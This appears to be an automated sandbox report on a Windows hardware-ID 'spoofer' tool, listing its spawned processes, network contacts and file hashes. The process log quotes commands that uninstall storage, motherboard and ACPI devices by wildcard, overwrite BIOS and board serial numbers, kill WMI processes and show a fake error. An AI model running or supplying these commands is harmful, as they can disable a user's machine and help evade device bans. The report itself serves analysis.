C:\Windows\system32\cmd.exe
cmd /C "color b && title Error && echo Signature checksum failed. Request was tampered with or session ended most likely. & echo: & echo Message: Session not found. Use latest code. You can only have app opened 1 at a time. && timeout /t 5"
C:\Windows\DevManView.exe
DevManView.exe /uninstall "STORAGE*" /use_wildcard
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\DevManView.exe
DevManView.exe /uninstall "Motherboard*" /use_wildcard
C:\Windows\DevManView.exe
DevManView.exe /uninstall "Volume*" /use_wildcard
C:\Windows\DevManView.exe
DevManView.exe /uninstall "Microsoft*" /use_wildcard
C:\Windows\DevManView.exe
DevManView.exe /uninstall "System*" /use_wildcard
C:\Windows\DevManView.exe
DevManView.exe /uninstall "ACPI\*" /use_wildcard
C:\Windows\DevManView.exe
DevManView.exe /uninstall "Remote*" /use_wildcard
C:\Windows\DevManView.exe
DevManView.exe /uninstall "Standard*" /use_wildcard
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /SU AUTO
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /BS 26668211451269713617
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /CS 571515691440811153
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /SS 1873230441108910170
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /PSN 11809176532753615083
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /IVN 13827125941701628060
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /IV 2277929547260231214
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /SM 22211247742271711332
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /SP 181978033855910978
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /SV 36846202471789
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /SS 276316460115349571
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /SK 339531995107496116
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /SF 29464101622264014081
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /BM 29598298991956429564
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /BP 30240168152963512721
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /BV 104936461482111803
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /BT 11174958576732841
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /BLC 26172146532846127634
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /CM 2242230139903416663
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /CV 30962203593162710665
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /CA 11494454275673643
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /CSK 13580279473054122745
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /PAT 1178850833108028233
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /PPN 81246415262719600
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /OS 1 3164296263058229369
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /OS 2 197381572457830161
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /OS 3 271873502256226422
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /OS 4 29347287513113828690
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /OS 5 187442799188417954
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /OS 6 24853098352123996
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /OS 7 2474527190556532016
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /OS 8 532614595985294
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /OS 9 122472179711790328
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /OS 10 1128141183676841
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /OS 11 21962162611964613383
C:\Windows\system32\taskkill.exe
TASKKILL /F /IM WmiPrvSE.exe
C:\Windows\system32\taskkill.exe
TASKKILL /F /IM WmiPrvSE.exe
C:\Windows\system32\PING.EXE
PING localhost -n 15
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\New folder\Spoofer.bat
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
C:\Windows\devcon.exe
devcon rescan
C:\Windows\system32\PING.EXE
ping www.google.com -n 1
C:\Windows\system32\find.exe
find "="
C:\Windows\system32\net.exe
net stop winmgmt /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop winmgmt /y
C:\Windows\system32\net.exe
net start winmgmt /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start winmgmt /y
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\sc.exe
sc stop winmgmt
C:\Windows\system32\sc.exe
sc start winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://docs.google.com/document/d/e/2PACX-1vSCFR7ny51MTSLmgXcfG1T9bUNNovomqDA3Nar9rnvvvnQ46BT6T44NFL1XMDJNC329G4d3xA1BjDSw/pub
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc860646f8,0x7ffc86064708,0x7ffc86064718
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,12758778303679416948,17503584943512163765,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,12758778303679416948,17503584943512163765,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,12758778303679416948,17503584943512163765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2956 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,12758778303679416948,17503584943512163765,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,12758778303679416948,17503584943512163765,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,12758778303679416948,17503584943512163765,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,12758778303679416948,17503584943512163765,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.144.216.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | eu.static.mega.co.nz | udp |
| NL | 66.203.127.11:443 | eu.static.mega.co.nz | tcp |
| NL | 66.203.127.11:443 | eu.static.mega.co.nz | tcp |
| GB | 142.250.179.234:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| LU | 66.203.125.14:443 | g.api.mega.co.nz | tcp |
| LU | 66.203.125.14:443 | g.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.127.203.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.125.203.66.in-addr.arpa | udp |
| NL | 66.203.127.11:443 | eu.static.mega.co.nz | tcp |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| US | 8.8.8.8:53 | gfs302n104.userstorage.mega.co.nz | udp |
| CA | 162.208.16.14:443 | gfs302n104.userstorage.mega.co.nz | tcp |
| CA | 162.208.16.14:443 | gfs302n104.userstorage.mega.co.nz | tcp |
| CA | 162.208.16.14:443 | gfs302n104.userstorage.mega.co.nz | tcp |
| CA | 162.208.16.14:443 | gfs302n104.userstorage.mega.co.nz | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 14.16.208.162.in-addr.arpa | udp |
| CA | 162.208.16.14:443 | gfs302n104.userstorage.mega.co.nz | tcp |
| CA | 162.208.16.14:443 | gfs302n104.userstorage.mega.co.nz | tcp |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 5.0.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| N/A | 127.0.0.1:61940 | tcp | |
| N/A | 127.0.0.1:61942 | tcp | |
| N/A | 127.0.0.1:61952 | tcp | |
| N/A | 127.0.0.1:61954 | tcp | |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| N/A | 127.0.0.1:61957 | tcp | |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| N/A | 127.0.0.1:61959 | tcp | |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| N/A | 127.0.0.1:64671 | tcp | |
| N/A | 127.0.0.1:64673 | tcp | |
| N/A | 127.0.0.1:64840 | tcp | |
| N/A | 127.0.0.1:64842 | tcp | |
| N/A | 127.0.0.1:64937 | tcp | |
| N/A | 127.0.0.1:64939 | tcp | |
| N/A | 127.0.0.1:49613 | tcp | |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.138.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.128.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.137.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| N/A | 127.0.0.1:49671 | tcp | |
| N/A | 127.0.0.1:49673 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 4.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 172.217.16.238:443 | clients2.google.com | udp |
| GB | 172.217.16.238:443 | clients2.google.com | tcp |
| GB | 142.250.179.234:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| GB | 88.221.135.11:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 11.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 95.101.143.201:443 | r.bing.com | tcp |
| GB | 95.101.143.201:443 | r.bing.com | tcp |
| GB | 88.221.135.26:443 | r.bing.com | tcp |
| GB | 88.221.135.26:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 201.143.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sourceforge.net | udp |
| US | 104.18.37.111:443 | sourceforge.net | tcp |
| US | 104.18.37.111:443 | sourceforge.net | tcp |
| US | 8.8.8.8:53 | a.fsdn.com | udp |
| US | 104.18.40.209:443 | a.fsdn.com | tcp |
| US | 104.18.40.209:443 | a.fsdn.com | tcp |
| US | 104.18.40.209:443 | a.fsdn.com | tcp |
| US | 104.18.40.209:443 | a.fsdn.com | tcp |
| US | 104.18.40.209:443 | a.fsdn.com | tcp |
| US | 104.18.40.209:443 | a.fsdn.com | tcp |
| US | 104.18.40.209:443 | a.fsdn.com | tcp |
| US | 104.18.40.209:443 | a.fsdn.com | tcp |
| US | 8.8.8.8:53 | d.delivery.consentmanager.net | udp |
| US | 8.8.8.8:53 | cdn.consentmanager.net | udp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| GB | 89.187.167.6:443 | cdn.consentmanager.net | tcp |
| US | 8.8.8.8:53 | c.sf-syn.com | udp |
| US | 172.64.154.159:443 | c.sf-syn.com | tcp |
| US | 8.8.8.8:53 | 111.37.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.40.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.98.230.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.167.187.89.in-addr.arpa | udp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| US | 8.8.8.8:53 | 159.154.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 8.8.8.8:53 | ml314.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | j.6sc.co | udp |
| US | 8.8.8.8:53 | analytics.slashdotmedia.com | udp |
| US | 34.117.77.79:443 | ml314.com | tcp |
| GB | 92.123.26.233:443 | j.6sc.co | tcp |
| US | 216.105.38.9:443 | analytics.slashdotmedia.com | tcp |
| GB | 172.217.169.34:443 | securepubads.g.doubleclick.net | tcp |
| US | 104.22.74.216:443 | btloader.com | tcp |
| US | 34.117.77.79:443 | ml314.com | udp |
| US | 8.8.8.8:53 | c.6sc.co | udp |
| US | 8.8.8.8:53 | b.6sc.co | udp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| GB | 172.217.169.34:443 | securepubads.g.doubleclick.net | udp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | dpm.demdex.net | udp |
| GB | 92.123.26.163:443 | b.6sc.co | tcp |
| US | 8.8.8.8:53 | sync.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | idsync.rlcdn.com | udp |
| IE | 99.81.228.109:443 | dpm.demdex.net | tcp |
| US | 15.197.193.217:443 | match.adsrvr.org | tcp |
| US | 35.244.174.68:443 | idsync.rlcdn.com | tcp |
| IE | 52.16.78.59:443 | sync.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | ps.eyeota.net | udp |
| DE | 52.57.150.20:443 | ps.eyeota.net | tcp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| US | 8.8.8.8:53 | c42ceef9daf93429c12f1a39d57d510a.safeframe.googlesyndication.com | udp |
| GB | 142.250.180.1:443 | c42ceef9daf93429c12f1a39d57d510a.safeframe.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | 79.77.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.26.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.74.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.38.105.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.23.211.130.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.2.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.26.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.228.81.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.193.197.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.174.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.78.16.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.150.57.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.10.230.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 142.250.178.1:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | 1.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.178.250.142.in-addr.arpa | udp |
| US | 216.105.38.9:443 | analytics.slashdotmedia.com | tcp |
| US | 8.8.8.8:53 | a76cc90a905212e3220f0231418f3f6f.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | trc.taboola.com | udp |
| US | 8.8.8.8:53 | tags.bluekai.com | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| NL | 185.89.210.244:443 | ib.adnxs.com | tcp |
| US | 151.101.129.44:443 | trc.taboola.com | tcp |
| GB | 95.100.245.12:443 | tags.bluekai.com | tcp |
| US | 8.8.8.8:53 | 244.210.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.129.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.ampproject.org | udp |
| GB | 216.58.201.97:443 | cdn.ampproject.org | tcp |
| GB | 216.58.201.97:443 | cdn.ampproject.org | tcp |
| GB | 216.58.201.97:443 | cdn.ampproject.org | tcp |
| GB | 216.58.201.97:443 | cdn.ampproject.org | tcp |
| GB | 216.58.201.97:443 | cdn.ampproject.org | tcp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| GB | 142.250.178.1:443 | tpc.googlesyndication.com | udp |
| GB | 142.250.178.1:443 | tpc.googlesyndication.com | udp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 172.217.169.66:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 66.169.217.172.in-addr.arpa | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | downloads.sourceforge.net | udp |
| US | 204.68.111.105:443 | downloads.sourceforge.net | tcp |
| US | 204.68.111.105:443 | downloads.sourceforge.net | tcp |
| US | 8.8.8.8:53 | netix.dl.sourceforge.net | udp |
| BG | 87.121.121.2:443 | netix.dl.sourceforge.net | tcp |
| US | 8.8.8.8:53 | 105.111.68.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.121.121.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| NL | 40.126.32.133:443 | login.microsoftonline.com | tcp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| N/A | 127.0.0.1:54397 | tcp | |
| N/A | 127.0.0.1:54399 | tcp | |
| N/A | 127.0.0.1:54402 | tcp | |
| N/A | 127.0.0.1:54404 | tcp | |
| N/A | 127.0.0.1:54407 | tcp | |
| N/A | 127.0.0.1:54409 | tcp | |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 95.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kreyzespoofer.com | udp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| US | 8.8.8.8:53 | 100.0.160.217.in-addr.arpa | udp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 57.110.18.2.in-addr.arpa | udp |
| N/A | 127.0.0.1:54721 | tcp | |
| N/A | 127.0.0.1:54723 | tcp | |
| US | 8.8.8.8:53 | docs.google.com | udp |
| GB | 172.217.169.78:443 | docs.google.com | tcp |
| US | 8.8.8.8:53 | 78.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lh7-us.googleusercontent.com | udp |
| GB | 142.250.187.225:443 | lh7-us.googleusercontent.com | tcp |
| GB | 142.250.187.225:443 | lh7-us.googleusercontent.com | tcp |
| GB | 142.250.187.225:443 | lh7-us.googleusercontent.com | tcp |
| GB | 142.250.187.225:443 | lh7-us.googleusercontent.com | tcp |
| GB | 142.250.187.225:443 | lh7-us.googleusercontent.com | tcp |
| GB | 142.250.187.225:443 | lh7-us.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.46:443 | play.google.com | tcp |
| GB | 142.250.200.46:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 216.58.204.67:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | 67.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| N/A | 127.0.0.1:61713 | tcp | |
| N/A | 127.0.0.1:61715 | tcp |
Files
\??\pipe\crashpad_4380_LZEPNBIWQVEOGMMI
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\000\p\Paths\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 2a403b26ee322a9558c9e464ebe82e5a |
| SHA1 | 057f4ce6ce1192ae5125668c580eb30fa8db8a31 |
| SHA256 | 7b2f3de3f72c20982c34e51c61835796285a9894b0b04878683afe42026fb514 |
| SHA512 | 7d3675291abc56d0c4e2b46114dfa5bb4cdfe28bfe8b5591565c0534e5ca9fc88aad625289285221d78824ab4becc937cf0df9132a4b4830ba348063e5b8fbda |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 79fb77b005273d50989e9711eb473fd3 |
| SHA1 | d450e3b29a2ec9c07f4467f0f5c01c109242262f |
| SHA256 | 271ba1c8a432a95837538009d380488e65753be184bb6642d80dcb6f8c4a55b7 |
| SHA512 | 497dfd4344cdf5e148989a0906debe046a8fc2cf25e34b2493690ead00d0776b060afc2da6e1e9a0cba2f1f3da573adcce5629e838859080f31ca71085a922e4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | e4feeaf29c8060b13682b7c0c2192116 |
| SHA1 | 6344c89b88c2010b8db685addf35194e9c4e75f9 |
| SHA256 | 853ca1371f0b619ee5183c471d1ca847b80d131c7bc64316101766cf6593e1d9 |
| SHA512 | 59927f2dfcd37c1094693c43987177565649ee33f12e6cd3c6f3dc766e1eb7ec6a91f0803353a1c05e40079d15bd9de705d837d88f7be41a2908af6640d9f1bc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 85377b7a053563143c0299d43e524c49 |
